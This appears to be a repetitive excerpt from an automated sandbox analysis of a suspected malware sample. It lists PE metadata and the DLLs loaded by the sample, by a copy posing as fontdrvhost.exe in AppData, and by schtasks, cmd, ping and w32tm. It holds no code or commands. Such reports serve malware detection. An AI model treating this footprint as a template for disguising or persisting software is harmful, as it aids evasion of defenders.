                        Source: SKewgrff.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: IbKgwPay.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: zsrQNmVQ.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: pJXAdKPi.log.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: ZT3pxe2Tb4.exe, 00000000.00000002.1670366434.000000001BFAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs ZT3pxe2Tb4.exe
                        Source: ZT3pxe2Tb4.exe, 00000000.00000000.1607054032.0000000000D64000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs ZT3pxe2Tb4.exe
                        Source: ZT3pxe2Tb4.exeBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs ZT3pxe2Tb4.exe
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: ktmw32.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: dlnashext.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: wpdshext.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ktmw32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dlnashext.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wpdshext.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                        Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ktmw32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dlnashext.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wpdshext.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ktmw32.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dlnashext.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wpdshext.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ktmw32.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: dlnashext.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wpdshext.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                        Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeSection loaded: windows.storage.dll
